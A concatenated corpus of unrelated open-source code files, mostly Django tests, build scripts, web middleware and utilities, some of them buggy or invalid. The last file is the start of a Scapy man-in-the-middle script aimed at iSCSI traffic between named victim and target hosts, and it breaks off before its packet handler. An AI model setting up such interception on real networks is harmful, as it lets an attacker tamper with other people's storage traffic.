def test_siblings(self):
self._connect(1, 0)
self._connect(2, 0)
self._collect(0)
self._check([0, [1, 2]])
def test_non_added_parent(self):
self._connect(0, 1)
self._collect(0)
self._check([0])
def test_cyclic(self):
self._connect(0, 2)
self._connect(1, 0)
self._connect(2, 1)
self._collect(0)
self._check([0, [1, [2]]])
def test_queries(self):
self._connect(1, 0)
self._connect(2, 0)
# 1 query to fetch all children of 0 (1 and 2)
# 1 query to fetch all children of 1 and 2 (none)
# Should not require additional queries to populate the nested graph.
self.assertNumQueries(2, self._collect, 0)
def test_on_delete_do_nothing(self):
"""
Check that the nested collector doesn't query for DO_NOTHING objects.
"""
n = NestedObjects(using=DEFAULT_DB_ALIAS)
objs = [Event.objects.create()]
EventGuide.objects.create(event=objs[0])
with self.assertNumQueries(2):
# One for Location, one for Guest, and no query for EventGuide
n.collect(objs)
class UtilTests(unittest.TestCase):
def test_values_from_lookup_field(self):
"""
Regression test for #12654: lookup_field
"""
SITE_NAME = 'example.com'
TITLE_TEXT = 'Some title'
CREATED_DATE = datetime.min
ADMIN_METHOD = 'admin method'
SIMPLE_FUNCTION = 'function'
INSTANCE_ATTRIBUTE = 'attr'
class MockModelAdmin(object):
def get_admin_value(self, obj):
return ADMIN_METHOD
simple_function = lambda obj: SIMPLE_FUNCTION
article = Article(
site=Site(domain=SITE_NAME),
title=TITLE_TEXT,
created=CREATED_DATE,
)
article.non_field = INSTANCE_ATTRIBUTE
verifications = (
('site', SITE_NAME),
('created', localize(CREATED_DATE)),
('title', TITLE_TEXT),
('get_admin_value', ADMIN_METHOD),
(simple_function, SIMPLE_FUNCTION),
('test_from_model', article.test_from_model()),
('non_field', INSTANCE_ATTRIBUTE)
)
mock_admin = MockModelAdmin()
for name, value in verifications:
field, attr, resolved_value = lookup_field(name, article, mock_admin)
if field is not None:
resolved_value = display_for_field(resolved_value, field)
self.assertEqual(value, resolved_value)
def test_null_display_for_field(self):
"""
Regression test for #12550: display_for_field should handle None
value.
"""
display_value = display_for_field(None, models.CharField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.CharField(
choices=(
(None, "test_none"),
)
))
self.assertEqual(display_value, "test_none")
display_value = display_for_field(None, models.DateField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.TimeField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
# Regression test for #13071: NullBooleanField has special
# handling.
display_value = display_for_field(None, models.NullBooleanField())
expected = '<img src="%sadmin/img/icon-unknown.gif" alt="None" />' % settings.STATIC_URL
self.assertEqual(display_value, expected)
display_value = display_for_field(None, models.DecimalField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.FloatField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
def test_label_for_field(self):
"""
Tests for label_for_field
"""
self.assertEqual(
label_for_field("title", Article),
"title"
)
self.assertEqual(
label_for_field("title2", Article),
"another name"
)
self.assertEqual(
label_for_field("title2", Article, return_attr=True),
("another name", None)
)
self.assertEqual(
label_for_field("__unicode__", Article),
"article"
)
self.assertEqual(
label_for_field("__str__", Article),
str("article")
)
self.assertRaises(
AttributeError,
lambda: label_for_field("unknown", Article)
)
def test_callable(obj):
return "nothing"
self.assertEqual(
label_for_field(test_callable, Article),
"Test callable"
)
self.assertEqual(
label_for_field(test_callable, Article, return_attr=True),
("Test callable", test_callable)
)
self.assertEqual(
label_for_field("test_from_model", Article),
"Test from model"
)
self.assertEqual(
label_for_field("test_from_model", Article, return_attr=True),
("Test from model", Article.test_from_model)
)
self.assertEqual(
label_for_field("test_from_model_with_override", Article),
"not What you Expect"
)
self.assertEqual(
label_for_field(lambda x: "nothing", Article),
"--"
)
class MockModelAdmin(object):
def test_from_model(self, obj):
return "nothing"
test_from_model.short_description = "not Really the Model"
self.assertEqual(
label_for_field("test_from_model", Article, model_admin=MockModelAdmin),
"not Really the Model"
)
self.assertEqual(
label_for_field("test_from_model", Article,
model_admin = MockModelAdmin,
return_attr = True
),
("not Really the Model", MockModelAdmin.test_from_model)
)
def test_related_name(self):
"""
Regression test for #13963
"""
self.assertEqual(
label_for_field('location', Event, return_attr=True),
('location', None),
)
self.assertEqual(
label_for_field('event', Location, return_attr=True),
('awesome event', None),
)
self.assertEqual(
label_for_field('guest', Event, return_attr=True),
('awesome guest', None),
)
def test_logentry_unicode(self):
"""
Regression test for #15661
"""
log_entry = admin.models.LogEntry()
log_entry.action_flag = admin.models.ADDITION
self.assertTrue(
six.text_type(log_entry).startswith('Added ')
)
log_entry.action_flag = admin.models.CHANGE
self.assertTrue(
six.text_type(log_entry).startswith('Changed ')
)
log_entry.action_flag = admin.models.DELETION
self.assertTrue(
six.text_type(log_entry).startswith('Deleted ')
)
# Make sure custom action_flags works
log_entry.action_flag = 4
self.assertEqual(six.text_type(log_entry), 'LogEntry Object')
def test_safestring_in_field_label(self):
# safestring should not be escaped
class MyForm(forms.Form):
text = forms.CharField(label=mark_safe('<i>text</i>'))
cb = forms.BooleanField(label=mark_safe('<i>cb</i>'))
form = MyForm()
self.assertEqual(helpers.AdminField(form, 'text', is_first=False).label_tag(),
'<label for="id_text" class="required inline"><i>text</i>:</label>')
self.assertEqual(helpers.AdminField(form, 'cb', is_first=False).label_tag(),
'<label for="id_cb" class="vCheckboxLabel required inline"><i>cb</i></label>')
# normal strings needs to be escaped
class MyForm(forms.Form):
text = forms.CharField(label='&text')
cb = forms.BooleanField(label='&cb')
form = MyForm()
self.assertEqual(helpers.AdminField(form, 'text', is_first=False).label_tag(),
'<label for="id_text" class="required inline">&text:</label>')
self.assertEqual(helpers.AdminField(form, 'cb', is_first=False).label_tag(),
'<label for="id_cb" class="vCheckboxLabel required inline">&cb</label>')
|
nzavagli/UnrealPy
|
refs/heads/master
|
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/tests/gis_tests/distapp/models.py
|
31
|
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from ..utils import gisfield_may_be_null
@python_2_unicode_compatible
class NamedModel(models.Model):
name = models.CharField(max_length=30)
objects = models.GeoManager()
class Meta:
abstract = True
def __str__(self):
return self.name
class SouthTexasCity(NamedModel):
"City model on projected coordinate system for South Texas."
point = models.PointField(srid=32140)
class SouthTexasCityFt(NamedModel):
"Same City model as above, but U.S. survey feet are the units."
point = models.PointField(srid=2278)
class AustraliaCity(NamedModel):
"City model for Australia, using WGS84."
point = models.PointField()
class CensusZipcode(NamedModel):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
poly = models.PolygonField(srid=4269)
class SouthTexasZipcode(NamedModel):
"Model for a few South Texas ZIP codes."
poly = models.PolygonField(srid=32140, null=gisfield_may_be_null)
class Interstate(NamedModel):
"Geodetic model for U.S. Interstates."
path = models.LineStringField()
class SouthTexasInterstate(NamedModel):
"Projected model for South Texas Interstates."
path = models.LineStringField(srid=32140)
|
geekboxzone/lollipop_external_skia
|
refs/heads/geekbox
|
platform_tools/android/bin/gyp_to_android.py
|
66
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Script for generating the Android framework's version of Skia from gyp
files.
"""
import os
import shutil
import sys
import tempfile
# Find the top of trunk
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
SKIA_DIR = os.path.normpath(os.path.join(SCRIPT_DIR, os.pardir, os.pardir,
os.pardir))
# Find the directory with our helper files, and add it to the path.
ANDROID_TOOLS = os.path.join(SKIA_DIR, 'platform_tools', 'android')
sys.path.append(ANDROID_TOOLS)
import gyp_gen.android_framework_gyp as android_framework_gyp
import gyp_gen.gypd_parser as gypd_parser
import gyp_gen.generate_user_config as generate_user_config
import gyp_gen.makefile_writer as makefile_writer
import gyp_gen.tool_makefile_writer as tool_makefile_writer
import gyp_gen.vars_dict_lib as vars_dict_lib
# Folder containing all gyp files and generated gypd files.
GYP_FOLDER = 'gyp'
def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon):
"""Create a VarsDict for a particular arch type.
Each paramater is passed directly to android_framework_gyp.main().
Args:
target_dir: Directory containing gyp files.
target_file: Target gyp file.
skia_arch_type: Target architecture.
have_neon: Whether the target should build for neon.
Returns:
A VarsDict containing the variable definitions determined by gyp.
"""
result_file = android_framework_gyp.main(target_dir, target_file,
skia_arch_type, have_neon)
var_dict = vars_dict_lib.VarsDict()
gypd_parser.parse_gypd(var_dict, result_file, '.')
android_framework_gyp.clean_gypd_files(target_dir)
print '.',
return var_dict
def main(target_dir=None, require_sk_user_config=False):
"""Create Android.mk for the Android framework's external/skia.
Builds Android.mk using Skia's gyp files.
Args:
target_dir: Directory in which to place 'Android.mk'. If None, the file
will be placed in skia's root directory.
require_sk_user_config: If True, raise an AssertionError if
SkUserConfig.h does not exist.
"""
# Create a temporary folder to hold gyp and gypd files. Create it in SKIA_DIR
# so that it is a sibling of gyp/, so the relationships between gyp files and
# other files (e.g. platform_tools/android/gyp/dependencies.gypi, referenced
# by android_deps.gyp as a relative path) is unchanged.
# Use mkdtemp to find an unused folder name, but then delete it so copytree
# can be called with a non-existent directory.
tmp_folder = tempfile.mkdtemp(dir=SKIA_DIR)
os.rmdir(tmp_folder)
shutil.copytree(os.path.join(SKIA_DIR, GYP_FOLDER), tmp_folder)
try:
main_gyp_file = 'android_framework_lib.gyp'
print 'Creating Android.mk',
# Generate a separate VarsDict for each architecture type. For each
# archtype:
# 1. call android_framework_gyp.main() to generate gypd files
# 2. call parse_gypd to read those gypd files into the VarsDict
# 3. delete the gypd files
#
# Once we have the VarsDict for each architecture type, we combine them all
# into a single Android.mk file, which can build targets of any
# architecture type.
# The default uses a non-existant archtype, to find all the general
# variable definitions.
default_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'other',
False)
arm_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm', False)
arm_neon_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm',
True)
x86_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86', False)
mips_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips', False)
mips64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips64',
False)
arm64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm64',
False)
# Compute the intersection of all targets. All the files in the intersection
# should be part of the makefile always. Each dict will now contain trimmed
# lists containing only variable definitions specific to that configuration.
var_dict_list = [default_var_dict, arm_var_dict, arm_neon_var_dict,
x86_var_dict, mips_var_dict, mips64_var_dict,
arm64_var_dict]
common = vars_dict_lib.intersect(var_dict_list)
common.LOCAL_MODULE.add('libskia')
# Create SkUserConfig
user_config = os.path.join(SKIA_DIR, 'include', 'config', 'SkUserConfig.h')
if target_dir:
dst_dir = target_dir
else:
dst_dir = os.path.join(SKIA_DIR, 'include', 'core')
generate_user_config.generate_user_config(
original_sk_user_config=user_config,
require_sk_user_config=require_sk_user_config, target_dir=dst_dir,
ordered_set=common.DEFINES)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='tests.gyp',
skia_trunk=target_dir,
dest_dir='tests',
skia_lib_var_dict=common,
local_module_name='skia_test',
local_module_tags=['tests'])
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='bench.gyp',
skia_trunk=target_dir,
dest_dir='bench',
skia_lib_var_dict=common,
local_module_name='skia_bench',
local_module_tags=['tests'],
place_in_local_tmp=True)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='gm.gyp',
skia_trunk=target_dir,
dest_dir='gm',
skia_lib_var_dict=common,
local_module_name='skia_gm',
local_module_tags=['tests'])
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='dm.gyp',
skia_trunk=target_dir,
dest_dir='dm',
skia_lib_var_dict=common,
local_module_name='skia_dm',
local_module_tags=['tests'])
# Now that the defines have been written to SkUserConfig and they've been
# used to skip adding them to the tools makefiles, they are not needed in
# Android.mk. Reset DEFINES.
common.DEFINES.reset()
# Further trim arm_neon_var_dict with arm_var_dict. After this call,
# arm_var_dict (which will now be the intersection) includes all definitions
# used by both arm and arm + neon, and arm_neon_var_dict will only contain
# those specific to arm + neon.
arm_var_dict = vars_dict_lib.intersect([arm_var_dict, arm_neon_var_dict])
# Now create a list of VarsDictData holding everything but common.
deviations_from_common = []
deviations_from_common.append(makefile_writer.VarsDictData(
arm_var_dict, 'arm'))
deviations_from_common.append(makefile_writer.VarsDictData(
arm_neon_var_dict, 'arm', 'ARCH_ARM_HAVE_NEON'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86'))
# Currently, x86_64 is identical to x86
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86_64'))
deviations_from_common.append(makefile_writer.VarsDictData(mips_var_dict,
'mips'))
deviations_from_common.append(makefile_writer.VarsDictData(mips64_var_dict,
'mips64'))
deviations_from_common.append(makefile_writer.VarsDictData(arm64_var_dict,
'arm64'))
makefile_writer.write_android_mk(target_dir=target_dir,
common=common, deviations_from_common=deviations_from_common)
finally:
shutil.rmtree(tmp_folder)
if __name__ == '__main__':
main()
|
spartonia/django-oscar
|
refs/heads/master
|
src/oscar/apps/basket/middleware.py
|
15
|
from django.conf import settings
from django.contrib import messages
from django.core.signing import BadSignature, Signer
from django.utils.functional import SimpleLazyObject, empty
from django.utils.translation import ugettext_lazy as _
from oscar.core.loading import get_class, get_model
Applicator = get_class('offer.utils', 'Applicator')
Basket = get_model('basket', 'basket')
Selector = get_class('partner.strategy', 'Selector')
selector = Selector()
class BasketMiddleware(object):
# Middleware interface methods
def process_request(self, request):
# Keep track of cookies that need to be deleted (which can only be done
# when we're processing the response instance).
request.cookies_to_delete = []
# Load stock/price strategy and assign to request (it will later be
# assigned to the basket too).
strategy = selector.strategy(request=request, user=request.user)
request.strategy = strategy
# We lazily load the basket so use a private variable to hold the
# cached instance.
request._basket_cache = None
def load_full_basket():
"""
Return the basket after applying offers.
"""
basket = self.get_basket(request)
basket.strategy = request.strategy
self.apply_offers_to_basket(request, basket)
return basket
def load_basket_hash():
"""
Load the basket and return the basket hash
Note that we don't apply offers or check that every line has a
stockrecord here.
"""
basket = self.get_basket(request)
if basket.id:
return self.get_basket_hash(basket.id)
# Use Django's SimpleLazyObject to only perform the loading work
# when the attribute is accessed.
request.basket = SimpleLazyObject(load_full_basket)
request.basket_hash = SimpleLazyObject(load_basket_hash)
def process_response(self, request, response):
# Delete any surplus cookies
cookies_to_delete = getattr(request, 'cookies_to_delete', [])
for cookie_key in cookies_to_delete:
response.delete_cookie(cookie_key)
if not hasattr(request, 'basket'):
return response
# If the basket was never initialized we can safely return
if (isinstance(request.basket, SimpleLazyObject)
and request.basket._wrapped is empty):
return response
cookie_key = self.get_cookie_key(request)
# Check if we need to set a cookie. If the cookies is already available
# but is set in the cookies_to_delete list then we need to re-set it.
has_basket_cookie = (
cookie_key in request.COOKIES
and cookie_key not in cookies_to_delete)
# If a basket has had products added to it, but the user is anonymous
# then we need to assign it to a cookie
if (request.basket.id and not request.user.is_authenticated()
and not has_basket_cookie):
cookie = self.get_basket_hash(request.basket.id)
response.set_cookie(
cookie_key, cookie,
max_age=settings.OSCAR_BASKET_COOKIE_LIFETIME,
secure=settings.OSCAR_BASKET_COOKIE_SECURE, httponly=True)
return response
def get_cookie_key(self, request):
"""
Returns the cookie name to use for storing a cookie basket.
The method serves as a useful hook in multi-site scenarios where
different baskets might be needed.
"""
return settings.OSCAR_BASKET_COOKIE_OPEN
def process_template_response(self, request, response):
if hasattr(response, 'context_data'):
if response.context_data is None:
response.context_data = {}
if 'basket' not in response.context_data:
response.context_data['basket'] = request.basket
else:
# Occasionally, a view will want to pass an alternative basket
# to be rendered. This can happen as part of checkout
# processes where the submitted basket is frozen when the
# customer is redirected to another site (eg PayPal). When the
# customer returns and we want to show the order preview
# template, we need to ensure that the frozen basket gets
# rendered (not request.basket). We still keep a reference to
# the request basket (just in case).
response.context_data['request_basket'] = request.basket
return response
# Helper methods
def get_basket(self, request):
"""
Return the open basket for this request
"""
if request._basket_cache is not None:
return request._basket_cache
num_baskets_merged = 0
manager = Basket.open
cookie_key = self.get_cookie_key(request)
cookie_basket = self.get_cookie_basket(cookie_key, request, manager)
if hasattr(request, 'user') and request.user.is_authenticated():
# Signed-in user: if they have a cookie basket too, it means
# that they have just signed in and we need to merge their cookie
# basket into their user basket, then delete the cookie.
try:
basket, __ = manager.get_or_create(owner=request.user)
except Basket.MultipleObjectsReturned:
# Not sure quite how we end up here with multiple baskets.
# We merge them and create a fresh one
old_baskets = list(manager.filter(owner=request.user))
basket = old_baskets[0]
for other_basket in old_baskets[1:]:
self.merge_baskets(basket, other_basket)
num_baskets_merged += 1
# Assign user onto basket to prevent further SQL queries when
# basket.owner is accessed.
basket.owner = request.user
if cookie_basket:
self.merge_baskets(basket, cookie_basket)
num_baskets_merged += 1
request.cookies_to_delete.append(cookie_key)
elif cookie_basket:
# Anonymous user with a basket tied to the cookie
basket = cookie_basket
else:
# Anonymous user with no basket - instantiate a new basket
# instance. No need to save yet.
basket = Basket()
# Cache basket instance for the during of this request
request._basket_cache = basket
if num_baskets_merged > 0:
messages.add_message(request, messages.WARNING,
_("We have merged a basket from a previous session. Its contents "
"might have changed."))
return basket
def merge_baskets(self, master, slave):
"""
Merge one basket into another.
This is its own method to allow it to be overridden
"""
master.merge(slave, add_quantities=False)
def get_cookie_basket(self, cookie_key, request, manager):
"""
Looks for a basket which is referenced by a cookie.
If a cookie key is found with no matching basket, then we add
it to the list to be deleted.
"""
basket = None
if cookie_key in request.COOKIES:
basket_hash = request.COOKIES[cookie_key]
try:
basket_id = Signer().unsign(basket_hash)
basket = Basket.objects.get(pk=basket_id, owner=None,
status=Basket.OPEN)
except (BadSignature, Basket.DoesNotExist):
request.cookies_to_delete.append(cookie_key)
return basket
def apply_offers_to_basket(self, request, basket):
if not basket.is_empty:
Applicator().apply(basket, request.user, request)
def get_basket_hash(self, basket_id):
return Signer().sign(basket_id)
|
rajive/mongrel2
|
refs/heads/master
|
examples/mp3stream/handler.py
|
98
|
from mp3stream import ConnectState, Streamer
from mongrel2 import handler
import glob
sender_id = "9703b4dd-227a-45c4-b7a1-ef62d97962b2"
CONN = handler.Connection(sender_id, "tcp://127.0.0.1:9995",
"tcp://127.0.0.1:9994")
STREAM_NAME = "Mongrel2 Radio"
MP3_FILES = glob.glob("*.mp3")
print "PLAYING:", MP3_FILES
CHUNK_SIZE = 8 * 1024
STATE = ConnectState()
STREAMER = Streamer(MP3_FILES, STATE, CONN, CHUNK_SIZE, sender_id)
STREAMER.start()
HEADERS = { 'icy-metaint': CHUNK_SIZE,
'icy-name': STREAM_NAME}
while True:
req = CONN.recv()
if req.is_disconnect():
print "DISCONNECT", req.headers, req.body, req.conn_id
STATE.remove(req)
else:
print "REQUEST", req.headers, req.body
if STATE.count() > 20:
print "TOO MANY", STATE.count()
CONN.reply_http(req, "Too Many Connected. Try Later.")
else:
STATE.add(req)
CONN.reply_http(req, "", headers=HEADERS)
|
barneyElDinosaurio/thefuck
|
refs/heads/master
|
tests/rules/test_python_execute.py
|
17
|
import pytest
from thefuck.rules.python_execute import match, get_new_command
from tests.utils import Command
@pytest.mark.parametrize('command', [
Command(script='python foo'),
Command(script='python bar')])
def test_match(command):
assert match(command, None)
@pytest.mark.parametrize('command, new_command', [
(Command('python foo'), 'python foo.py'),
(Command('python bar'), 'python bar.py')])
def test_get_new_command(command, new_command):
assert get_new_command(command, None) == new_command
|
Erethon/synnefo
|
refs/heads/develop
|
snf-astakos-app/astakos/scripts/snf_service_export.py
|
9
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'synnefo.settings'
import sys
from optparse import OptionParser
from synnefo.lib.services import fill_endpoints, filter_public
from django.utils import simplejson as json
astakos_services = {
'astakos_account': {
'type': 'account',
'component': 'astakos',
'prefix': 'account',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {
'pending_app': {
'desc': "Number of pending project applications",
'name': "astakos.pending_app",
'service_type': "account",
'service_origin': "astakos_account",
"ui_visible": False,
"api_visible": False},
},
},
'astakos_identity': {
'type': 'identity',
'component': 'astakos',
'prefix': 'identity',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {},
},
'astakos_weblogin': {
'type': 'astakos_weblogin',
'component': 'astakos',
'prefix': 'weblogin',
'public': True,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'astakos_ui': {
'type': 'astakos_ui',
'component': 'astakos',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'astakos_admin': {
'type': 'astakos_admin',
'component': 'astakos',
'prefix': 'admin',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
}
from astakos.oa2.services import oa2_services
astakos_services.update(oa2_services)
cyclades_services = {
'cyclades_compute': {
'type': 'compute',
'component': 'cyclades',
'prefix': 'compute',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {
'vm': {
"name": "cyclades.vm",
"desc": "Number of virtual machines",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'total_cpu': {
"name": "cyclades.total_cpu",
"desc": "Number of virtual machine processors",
"service_type": "compute",
"service_origin": "cyclades_compute",
"ui_visible": False,
"api_visible": False,
},
'cpu': {
"name": "cyclades.cpu",
"desc": "Number of virtual machine processors of running"
" servers",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'total_ram': {
"name": "cyclades.total_ram",
"desc": "Virtual machine memory size",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
"ui_visible": False,
"api_visible": False,
},
'ram': {
"name": "cyclades.ram",
"desc": "Virtual machine memory size of running servers",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
'disk': {
"name": "cyclades.disk",
"desc": "Virtual machine disk size",
"unit": "bytes",
"service_type": "compute",
"service_origin": "cyclades_compute",
},
},
},
'cyclades_plankton': {
'type': 'image',
'component': 'cyclades',
'prefix': 'image',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {},
},
'cyclades_network': {
'type': 'network',
'component': 'cyclades',
'prefix': 'network',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {
'network-private': {
"name": "cyclades.network.private",
"desc": "Number of private networks",
"service_type": "network",
"service_origin": "cyclades_network",
},
'floating_ip': {
"name": "cyclades.floating_ip",
"desc": "Number of Floating IP addresses",
"service_type": "network",
"service_origin": "cyclades_network",
},
},
},
'cyclades_vmapi': {
'type': 'vmapi',
'component': 'cyclades',
'prefix': 'vmapi',
'public': True,
'endpoints': [
{'versionId': 'v1.0',
'publicURL': None},
],
'resources': {},
},
'cyclades_helpdesk': {
'type': 'cyclades_helpdesk',
'component': 'cyclades',
'prefix': 'helpdesk',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
},
'cyclades_userdata': {
'type': 'cyclades_userdata',
'component': 'cyclades',
'prefix': 'userdata',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_ui': {
'type': 'cyclades_ui',
'component': 'cyclades',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_admin': {
'type': 'admin',
'component': 'cyclades',
'prefix': 'admin',
'public': True,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'cyclades_volume': {
'type': 'volume',
'component': 'cyclades',
'prefix': 'volume',
'public': True,
'endpoints': [
{'versionId': 'v2.0',
'publicURL': None},
],
'resources': {},
},
}
pithos_services = {
'pithos_object-store': {
'type': 'object-store',
'component': 'pithos',
'prefix': 'object-store',
'public': True,
'endpoints': [
{'versionId': 'v1',
'publicURL': None},
],
'resources': {
'diskspace': {
"desc": "Pithos account diskspace",
"name": "pithos.diskspace",
"unit": "bytes",
"service_type": "object-store",
"service_origin": "pithos_object-store",
},
},
},
'pithos_public': {
'type': 'pithos_public',
'component': 'pithos',
'prefix': 'public',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
'pithos_ui': {
'type': 'pithos_ui',
'component': 'pithos',
'prefix': 'ui',
'public': False,
'endpoints': [
{'versionId': '',
'publicURL': None},
],
'resources': {},
},
}
definitions = {
'astakos': astakos_services,
'cyclades': cyclades_services,
'pithos': pithos_services,
}
def print_definitions(d, base_url):
fill_endpoints(d, base_url)
print json.dumps(filter_public(d), indent=4)
usage = "usage: %prog <component_name> <base_url>"
parser = OptionParser(usage=usage)
def main():
(options, args) = parser.parse_args()
if len(args) != 2:
parser.error("Wrong number of arguments.")
component = args[0]
try:
services = definitions[component]
except KeyError:
print >> sys.stderr, "Unrecognized component %s" % component
exit(1)
base_url = args[1]
print_definitions(services, base_url)
if __name__ == '__main__':
main()
|
praveenaki/zulip
|
refs/heads/master
|
zerver/management/commands/rename_stream.py
|
116
|
from __future__ import absolute_import
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_rename_stream
from zerver.models import Realm, get_realm
import sys
class Command(BaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
parser.add_argument('domain', metavar='<domain>', type=str,
help="domain to operate on")
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
parser.add_argument('new_name', metavar='<new name>', type=str,
help='new name to rename the stream to')
def handle(self, *args, **options):
domain = options['domain']
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
try:
realm = get_realm(domain)
except Realm.DoesNotExist:
print "Unknown domain %s" % (domain,)
exit(1)
do_rename_stream(realm, old_name.decode(encoding),
new_name.decode(encoding))
|
diblaze/TDP002
|
refs/heads/master
|
Old Exams/201508/Uppgift5.py
|
1
|
#! /usr/bin/env python3
import random
import re
if __name__ == "__main__":
number = input("Mata in ett heltal: ")
number = int(number)
list_of_random_numbers = [format(random.randint(0, 59), "02") for x in range(number)]
print(list_of_random_numbers)
found = []
notDone = True
while notDone:
i = 0
if i > len(list_of_random_numbers):
notDone = False
continue
time = str(list_of_random_numbers[i]) + ":" + str(list_of_random_numbers[i+1])
if(re.match("^[0-2][1-3]:[0-5][0-9]$", time)):
found.append(time)
i += 2
notDone = False
|
kang000feng/shadowsocks
|
refs/heads/master
|
utils/autoban.py
|
1033
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='See README')
parser.add_argument('-c', '--count', default=3, type=int,
help='with how many failure times it should be '
'considered as an attack')
config = parser.parse_args()
ips = {}
banned = set()
for line in sys.stdin:
if 'can not parse header when' in line:
ip = line.split()[-1].split(':')[0]
if ip not in ips:
ips[ip] = 1
print(ip)
sys.stdout.flush()
else:
ips[ip] += 1
if ip not in banned and ips[ip] >= config.count:
banned.add(ip)
cmd = 'iptables -A INPUT -s %s -j DROP' % ip
print(cmd, file=sys.stderr)
sys.stderr.flush()
os.system(cmd)
|
agancsos/python
|
refs/heads/master
|
team_in_Python.py
|
1
|
team={};
team[Lead]=\"t\";
team[SR Analyst]=\"Rob\";
team[SR Analyst]=\"Usha\";
team[SR Analyst]=\"Tom\";
for title,person in team.iteritems():
print person,\",\",title
|
Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection
|
refs/heads/master
|
Scapy/ip_forward.py
|
2
|
#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.190"
#The IP of this Kali Virtualbox system
MY_IP = "192.168.1.143"
# gateway is the target
TARGET_IP = "192.168.1.191"
#VICTIM_MAC = "### This is the MAC of this Kali virtual box - since its virtual it shouldn't change.###"
MY_MAC = "08:00:27:f2:ee:7c"
#target mac address
TARGET_MAC = "08:00:27:da:24:ee"
#initiator mac address
VICTIM_MAC = "08:00:27:26:ba:94"
def parse_to_hex(packet):
# lines below are to redirect hexdump to a file so that we can use in the python script again
stdout = sys.stdout
sys.stdout = open('packet.txt', 'w')
hexdump(packet)
sys.stdout.close()
sys.stdout = stdout
packet_str = open('packet.txt', 'r')
packet_hex = ''
#trimming the hexadecimal packet to get only the hexadecimal content
for line in packet_str:
hexline = line.split(' ')[1]
hexline = hexline.replace(' ', ' ')
packet_hex = packet_hex + ' ' + hexline
packet_str.close()
packet_hex = packet_hex.strip()
return packet_hex
def handle_packet(packet):
